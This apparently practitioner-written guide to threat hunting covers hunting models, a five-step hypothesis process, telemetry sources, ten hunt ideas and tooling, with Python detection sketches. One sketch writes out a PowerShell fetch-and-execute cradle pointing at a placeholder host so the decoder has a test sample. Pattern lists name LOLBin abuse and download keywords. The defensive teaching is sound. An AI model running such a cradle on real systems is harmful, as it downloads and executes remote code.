Introduction
Your SIEM generates alerts. Your EDR generates alerts. Your firewall generates alerts. You triage them, you respond to them, you close them. And then one day you discover that an attacker has been in your network for six months, exfiltrating data through a channel that never triggered an alert. Dwell time for undetected breaches is still measured in months, not days — IBM's 2024 Cost of a Data Breach report puts the average time to identify a breach at 194 days. This is the problem threat hunting solves.
I have built threat hunting programs at three organizations of different sizes, and I can tell you with certainty: the single most effective security investment a mid-size company can make — after basic hygiene like MFA and patching — is proactive threat hunting. Not because the tools are expensive (they are not), but because it fundamentally changes how your security team thinks about threats.
What Threat Hunting Actually Is (and Is Not)
Threat hunting is not alert triage. It is not running automated scans. It is not checking dashboards. It is not scrolling through SIEM queries hoping something looks wrong. Threat hunting is the proactive, hypothesis-driven search for threats that have evaded your existing detection capabilities. It starts with a question, uses data to answer that question, and results in either a confirmed threat or an improved understanding of your environment.
The critical distinction: alert-driven security is reactive — something fires, you investigate. Threat hunting is proactive — you go looking for adversary behavior before any alert fires. Your SIEM rules and EDR signatures were written for known threats. Threat hunting finds the unknown ones.
Here is a concrete example. Last year, during a routine threat hunt at a manufacturing client, I hypothesized that an adversary might use legitimate remote management tools (like AnyDesk or ScreenConnect) as an alternative to traditional C2. I queried EDR telemetry for processes with those tool names running on systems where they were not deployed by IT. We found ScreenConnect installed on three workstations in the engineering department — installed by an attacker who had phished an engineer four weeks earlier. No alert had fired because ScreenConnect is a legitimate tool. Without the hunt, that access would have persisted for months.
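A hunt like this reduces to a set difference between observed process executions and the IT deployment inventory. A minimal sketch in Python, with hypothetical event and inventory shapes (your EDR's export fields will differ):

```python
# Hunt sketch: remote-management tools running where IT never deployed them.
# Event and inventory shapes are hypothetical -- adapt the field names
# to your EDR's export format and your asset inventory.

RMM_TOOLS = {"anydesk.exe", "screenconnect.clientservice.exe", "teamviewer.exe"}

# Hosts where IT legitimately deployed each tool (from change/asset records).
it_deployments = {
    "anydesk.exe": {"HELPDESK-01", "HELPDESK-02"},
}

def find_rogue_rmm(process_events, deployments):
    """Return (host, process) pairs where an RMM tool runs outside sanctioned hosts."""
    findings = []
    for event in process_events:
        name = event["process_name"].lower()
        if name in RMM_TOOLS and event["host"] not in deployments.get(name, set()):
            findings.append((event["host"], name))
    return findings

events = [
    {"host": "HELPDESK-01", "process_name": "AnyDesk.exe"},  # sanctioned by IT
    {"host": "ENG-WS-117", "process_name": "AnyDesk.exe"},   # never deployed here
]
print(find_rogue_rmm(events, it_deployments))
# -> [('ENG-WS-117', 'anydesk.exe')]
```

The inventory comparison is the whole trick: the tool is legitimate everywhere except where IT never put it.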
The Three Hunting Models
Not every organization hunts the same way. The three primary models — intelligence-driven, analytics-driven, and situational awareness — each have strengths and appropriate use cases.
Intelligence-driven hunting starts with external threat intelligence. You learn that a particular APT group is targeting your industry using a specific technique — say, DLL search order hijacking in Microsoft Teams. You build a hypothesis: "Is there evidence of DLL search order hijacking on endpoints running Microsoft Teams in our environment?" Then you write queries against your EDR or SIEM to test that hypothesis. This model works best when you have access to quality threat intelligence that is specific to your industry and threat profile.
Analytics-driven hunting starts with your own data. Instead of looking for specific adversary techniques, you look for statistical anomalies — behaviors that deviate from your environment's baseline. A workstation that suddenly makes 10,000 DNS queries in an hour. A service account that authenticates from an IP it has never used before. A process that writes to the Windows Registry in a pattern inconsistent with its normal behavior. This model works best when you have rich telemetry and baseline data to compare against.
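The baseline comparison behind analytics-driven hunting can be as simple as a per-host z-score test. A sketch with invented daily DNS query counts; the threshold and data shapes are assumptions to tune for your environment:

```python
# Analytics-driven hunt sketch: flag hosts whose DNS query volume deviates
# sharply from their own historical baseline. All counts are hypothetical.
from statistics import mean, stdev

def dns_anomalies(baselines, today, threshold=3.0):
    """Flag hosts whose count today exceeds mean + threshold * stdev of baseline."""
    flagged = []
    for host, history in baselines.items():
        mu, sigma = mean(history), stdev(history)
        if sigma > 0 and (today.get(host, 0) - mu) / sigma > threshold:
            flagged.append(host)
    return flagged

# 14-day baseline of daily DNS query counts per host, then today's counts.
baselines = {
    "WS-042": [800, 760, 820, 790, 810, 805, 795, 815, 780, 800, 790, 810, 800, 795],
    "WS-117": [600, 610, 590, 605, 600, 595, 615, 600, 590, 610, 605, 595, 600, 610],
}
today = {"WS-042": 812, "WS-117": 9400}  # WS-117 spiked: possible tunneling/DGA

print(dns_anomalies(baselines, today))
# -> ['WS-117']
```

The same skeleton works for any counted behavior: authentications per account, bytes out per host, registry writes per process.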
Situational awareness hunting is triggered by changes in your environment. You just completed an acquisition and merged networks. You just deployed a new application. A critical vendor reported a breach. A former employee with domain admin access was terminated. Each of these situations creates a window of elevated risk that warrants proactive investigation. This model works best as a complement to the other two.
The Hypothesis-Driven Hunting Framework
Every successful hunt follows a structured process. Skip any step and the hunt loses value.
Step 1: Formulate the hypothesis. A good hypothesis is specific, testable, and grounded in threat intelligence or environmental knowledge. "Bad things might be happening" is not a hypothesis. "An attacker may be using PowerShell encoded commands to download and execute payloads from external domains on workstations in the finance department" — that is a hypothesis you can test.
Step 2: Identify required data sources. For the hypothesis above, you need: PowerShell script block logging or Sysmon events capturing command-line arguments, DNS query logs or proxy logs to identify external domain resolution, and endpoint process creation events showing parent-child relationships. If you do not have one of these data sources, document the gap and either acquire the data or adjust the hypothesis.
Step 3: Build and execute queries. Translate your hypothesis into concrete queries. For the PowerShell example: query for processes where the command line contains -EncodedCommand or -enc or Base64-encoded strings. Cross-reference the decoded commands against known malicious patterns — Invoke-WebRequest, Net.WebClient, DownloadString. Filter out known-good automated scripts by correlating against your IT automation inventory.
Step 4: Analyze results. This is where human expertise matters. A query might return 500 results. Most are legitimate automation — SCCM scripts, monitoring tools, IT maintenance. The one that is an attacker hiding in the noise requires an analyst who understands what normal looks like and can spot what does not belong.
Step 5: Document and close. Whether the hunt found a threat or not, document everything: the hypothesis, data sources used, queries executed, results, analysis, and conclusions. Negative results are valuable — they confirm your environment is clean against a specific technique and create a methodology that future hunters can reuse.
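Steps 3 and 4 of the PowerShell hypothesis can be prototyped offline: decode the -EncodedCommand payload (base64 over UTF-16LE) and match it against the download-cradle patterns from Step 3. The sample command line below is constructed purely for illustration:

```python
# Sketch of Steps 3-4: decode PowerShell -EncodedCommand arguments and flag
# decoded scripts that contain download-cradle patterns. Illustrative only.
import base64
import re

SUSPICIOUS = ("Invoke-WebRequest", "Net.WebClient", "DownloadString", "IEX")

def decode_encoded_command(cmdline):
    """Extract and decode a -EncodedCommand/-enc payload (UTF-16LE under base64)."""
    m = re.search(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", cmdline, re.IGNORECASE)
    if not m:
        return None
    return base64.b64decode(m.group(1)).decode("utf-16-le", errors="replace")

def flag_suspicious(cmdline):
    """Return (decoded_script, matched_patterns) or None if nothing matches."""
    decoded = decode_encoded_command(cmdline)
    if decoded is None:
        return None
    hits = [p for p in SUSPICIOUS if p.lower() in decoded.lower()]
    return (decoded, hits) if hits else None

# Build a sample the way an attacker would: UTF-16LE, then base64.
payload = "IEX (New-Object Net.WebClient).DownloadString('http://example.test/a')"
encoded = base64.b64encode(payload.encode("utf-16-le")).decode()
result = flag_suspicious(f"powershell.exe -NoP -enc {encoded}")
print(result[1])
# -> ['Net.WebClient', 'DownloadString', 'IEX']
```

In a real hunt you would feed this the command-line field from EDR process events and then do the Step 4 work by hand: correlating survivors against your IT automation inventory.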
Essential Data Sources for Threat Hunting
You cannot hunt without data. The quality and completeness of your telemetry directly determines what threats you can find. Here are the data sources I consider essential, ordered by priority:
Endpoint Detection and Response (EDR) telemetry. Process creation events with full command-line arguments, file writes, registry modifications, network connections per process, and module loads. This is the single most valuable data source for threat hunting. If you have nothing else, start here. CrowdStrike, SentinelOne, Microsoft Defender for Endpoint, and Carbon Black all provide this.
Authentication and identity logs. Every successful and failed login, every privilege escalation, every group membership change, every service account authentication. Windows Security Event Logs (IDs 4624, 4625, 4648, 4672, 4720, 4732), Active Directory audit logs, Entra ID sign-in logs, and Okta system logs. These show you who is accessing what, from where, and when — the foundation for detecting lateral movement and credential abuse.
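As a small illustration of what these logs enable, counting failed logons (Event ID 4625) per account and source is enough to surface password guessing. Event shapes here are hypothetical; map them to your log pipeline's fields:

```python
# Authentication-log hunt sketch: bursts of failed logons (Event ID 4625)
# against one account from one source can indicate password guessing.
from collections import Counter

def failed_logon_bursts(events, threshold=10):
    """Count 4625 events per (account, source_ip) and flag pairs at/over threshold."""
    counts = Counter(
        (e["account"], e["source_ip"])
        for e in events
        if e["event_id"] == 4625
    )
    return {pair: n for pair, n in counts.items() if n >= threshold}

events = (
    [{"event_id": 4625, "account": "svc-backup", "source_ip": "10.9.8.7"}] * 25
    + [{"event_id": 4624, "account": "svc-backup", "source_ip": "10.0.0.5"}]
)
print(failed_logon_bursts(events))
# -> {('svc-backup', '10.9.8.7'): 25}
```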
DNS query logs. Every DNS query from every endpoint and server, with the source IP and the response. DNS is the nervous system of your network, and it is abused by virtually every category of threat — C2 beaconing, data exfiltration, DGA-based malware, and reconnaissance. Enable DNS logging on your resolvers (Windows DNS Server, Infoblox, Pi-hole) or deploy a passive DNS collector.
Network flow data. NetFlow, sFlow, or IPFIX from your core switches and routers. Flow data shows you traffic volumes, connection patterns, and communication relationships between hosts. It does not show payload content, but it reveals lateral movement, data exfiltration patterns, and C2 beacon intervals through traffic analysis.
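One concrete use of flow data: C2 beacons tend to connect at near-constant intervals, so low jitter relative to the mean gap between connections is a useful signal. A sketch with invented timestamps; the jitter threshold is an assumption to tune:

```python
# Flow-data hunt sketch: flag (src, dst) pairs whose connection inter-arrival
# times are suspiciously regular, as C2 beacons often are. Data is hypothetical.
from statistics import mean, stdev

def beacon_candidates(flows, max_jitter=0.1, min_connections=6):
    """Flag pairs whose inter-arrival stdev/mean ratio falls below max_jitter."""
    flagged = []
    for pair, times in flows.items():
        if len(times) < min_connections:
            continue
        gaps = [b - a for a, b in zip(times, times[1:])]
        mu = mean(gaps)
        if mu > 0 and stdev(gaps) / mu < max_jitter:
            flagged.append(pair)
    return flagged

flows = {
    # Connects every ~300 s with small jitter: beacon-like.
    ("10.1.2.3", "203.0.113.50"): [0, 301, 599, 902, 1198, 1503, 1799],
    # Irregular human browsing: not beacon-like.
    ("10.1.2.4", "198.51.100.7"): [0, 45, 400, 410, 2000, 2100, 5000],
}
print(beacon_candidates(flows))
# -> [('10.1.2.3', '203.0.113.50')]
```

Real C2 frameworks add deliberate jitter, so in practice you would widen the threshold and combine this with destination reputation.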
Proxy and firewall logs. HTTP/HTTPS requests with URLs, user agents, and byte counts. Firewall connection logs with allow/deny decisions. These show you what your endpoints are talking to on the internet and help identify connections to suspicious infrastructure — newly registered domains, free hosting providers, and known C2 infrastructure.
Ten Practical Hunt Ideas You Can Run This Week
You do not need months of preparation to start hunting. Here are ten hunts that produce results with data most organizations already have:
1. Persistence mechanism audit. Query for scheduled tasks, Windows services, registry run keys, startup folder entries, and WMI event subscriptions created in the last 30 days. Compare against your IT change management records. Anything that does not match a documented change warrants investigation.
2. Unusual parent-child process relationships. Excel spawning PowerShell. Word spawning cmd.exe. Outlook spawning a script interpreter. These are classic indicators of macro-based attacks. Query your EDR for unexpected parent-child relationships and investigate any that do not match known business processes.
3. Service account anomalies. Service accounts should authenticate from a predictable set of hosts. Query authentication logs for service accounts that authenticated from new or unusual hosts in the last 7 days. An attacker who compromises a service account will use it from a different location than its legitimate usage.
4. DNS query volume spikes. Identify endpoints that made significantly more DNS queries than their historical baseline. A sudden spike in DNS queries — especially to a single domain or to many unique domains — can indicate DNS tunneling, DGA-based malware, or data exfiltration over DNS.
5. Living-off-the-land binary (LOLBin) usage. Hunt for unusual use of legitimate Windows binaries: certutil.exe downloading files, mshta.exe executing scripts, bitsadmin.exe creating transfer jobs, rundll32.exe loading DLLs from unusual paths. These are the tools attackers use when they want to avoid dropping malware.
6. Lateral movement patterns. Query for RDP sessions between workstations (workstation-to-workstation RDP is almost always suspicious), PsExec or WMI remote execution between non-admin systems, and SMB file shares accessed by accounts that have never accessed them before.
7. Data staging and exfiltration. Look for large files created in temporary directories, unusual archiving activity (rar.exe, 7z.exe, tar), and large outbound data transfers to cloud storage providers (Mega, Google Drive, Dropbox) from hosts that do not normally access those services.
8. Newly registered domain connections. Cross-reference your proxy logs against domain WHOIS data to identify connections to domains registered in the last 30 days. Legitimate businesses rarely use brand-new domains. Attackers register new infrastructure for every campaign.
9. Anomalous authentication timing. Identify accounts that authenticate outside their normal working hours. An analyst who normally works 9 AM to 6 PM authenticating at 3 AM from a new location is suspicious. This does not prove compromise, but it warrants a phone call.
10. Certificate anomalies in TLS traffic. Hunt for outbound TLS connections to servers using self-signed certificates, certificates with unusually short validity periods (common with Let's Encrypt abuse), or certificates whose subject does not match the domain. Many C2 frameworks use TLS with lazy or misconfigured certificates that stand out from legitimate traffic.
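To make one of these concrete, hunt #2 is essentially a membership check against two small sets. A sketch with hypothetical EDR event shapes:

```python
# Sketch of hunt #2: flag process-creation events where an Office application
# spawns a shell or script interpreter. Field names are hypothetical --
# map them to your EDR's parent/child process fields.
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SUSPECT_CHILDREN = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

def suspicious_spawns(events):
    """Return events where an Office parent launched a shell/script child."""
    return [
        e for e in events
        if e["parent"].lower() in OFFICE_PARENTS
        and e["child"].lower() in SUSPECT_CHILDREN
    ]

events = [
    {"host": "FIN-WS-09", "parent": "EXCEL.EXE", "child": "powershell.exe"},  # macro pattern
    {"host": "FIN-WS-10", "parent": "explorer.exe", "child": "cmd.exe"},      # normal
]
for e in suspicious_spawns(events):
    print(e["host"], e["parent"], "->", e["child"])
# -> FIN-WS-09 EXCEL.EXE -> powershell.exe
```

The analysis step still belongs to a human: some finance teams run sanctioned macros that spawn cmd.exe, and only your environment's baseline tells you which hits are noise.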
Tools for Threat Hunting
You do not need a dedicated threat hunting platform to start, but the right tools make hunting more efficient and scalable.
Your SIEM. Splunk, Elastic Security, Microsoft Sentinel, Google Chronicle — whatever you already have. The hunting platform is wherever your logs are aggregated. Learn your SIEM's query language well enough to write complex correlations, and save your hunting queries as reusable templates.
Velociraptor. An open-source endpoint visibility and forensics tool that lets you run VQL (Velociraptor Query Language) queries across your entire endpoint fleet in minutes. It is the closest thing to having a forensic analyst on every machine simultaneously. Free, powerful, and purpose-built for hunting.
MITRE ATT&CK Navigator. Use it to map your hunting coverage against the ATT&CK matrix. Color-code techniques by hunting status: green for hunted and validated, yellow for hunted with partial coverage, red for not yet hunted. This creates a visual roadmap for your hunting program.
Jupyter Notebooks. For analytics-driven hunting, Jupyter notebooks let you combine data analysis, visualization, and documentation in a single artifact. Query your SIEM API, analyze the results with pandas, visualize patterns with matplotlib, and document your methodology — all in one reproducible document.
Sigma rules. Sigma is a generic signature format for SIEM systems. The community-maintained Sigma rule repository contains hundreds of detection rules mapped to ATT&CK techniques. Use them as starting points for hunts — convert a Sigma rule into a query, run it against your data, and analyze the results.
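To show the shape of that conversion without the real toolchain (pySigma and sigma-cli handle actual backends), here is a toy rendering of a Sigma-style selection as a query string. The detection content mirrors a common certutil-download pattern, written as a plain dict rather than YAML purely for illustration:

```python
# Toy illustration of turning a Sigma-style detection into a SIEM query string.
# Not a real converter -- it only shows the field|modifier -> clause mapping.
detection = {
    "selection": {
        "Image|endswith": "\\certutil.exe",
        "CommandLine|contains": "urlcache",
    },
    "condition": "selection",
}

def to_query(selection):
    """Naively render a Sigma-style selection as an AND-joined query string."""
    clauses = []
    for key, value in selection.items():
        field, _, modifier = key.partition("|")
        if modifier == "endswith":
            clauses.append(f'{field}="*{value}"')
        elif modifier == "contains":
            clauses.append(f'{field}="*{value}*"')
        else:
            clauses.append(f'{field}="{value}"')
    return " AND ".join(clauses)

print(to_query(detection["selection"]))
# -> Image="*\certutil.exe" AND CommandLine="*urlcache*"
```

Run the converted query, triage the hits, and if the rule keeps producing value, promote it to a permanent detection.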
Building a Sustainable Hunting Program
You do not need a dedicated hunting team to start. Allocate 20% of a senior analyst's time to hunting — one day per week, they step away from the alert queue and go looking for threats proactively. The first hunt that finds something your automated detection missed will justify the investment ten times over.
As your program matures, formalize it. Establish a hunting cadence — weekly hunts for tactical priorities, monthly hunts for strategic threats, and ad-hoc hunts triggered by new intelligence or environmental changes. Maintain a hunt log that tracks hypotheses, data sources, findings, and outcomes. Share findings across the team so institutional knowledge does not depend on a single person.
Every hunt that finds nothing still has value: it validates your security posture against a specific threat, creates a reusable methodology, and builds your team's analytical skills. Every hunt that finds something is a detection that your automated tools missed — fix the detection gap, and your security posture improves permanently.
Measuring Hunting Program Effectiveness
Metrics matter for sustaining executive support and measuring improvement over time. Track these:
Hunts completed per quarter. Volume matters because hunting is a numbers game — the more hypotheses you test, the more likely you are to find something. Aim for 10-15 hunts per quarter per full-time hunter.
Mean time to detect (MTTD) for hunt-discovered threats versus alert-discovered threats. Hunting typically catches threats earlier in the kill chain, which translates directly to reduced business impact.
New detections created from hunt findings. Every hunt that reveals a detection gap should result in a new SIEM rule or EDR detection. Track how many hunts convert into permanent detection improvements — this is the compounding return on your hunting investment.
ATT&CK coverage expansion. Measure the percentage of ATT&CK techniques you have hunted for over the past year. This shows strategic progress toward comprehensive threat coverage.
Threat hunting transforms your security posture from reactive to proactive, from alert-dependent to intelligence-driven. It finds what your tools miss, builds your team's expertise, and continuously improves your detection capabilities. The adversaries are already in networks — the question is whether you go looking for them before they achieve their objectives.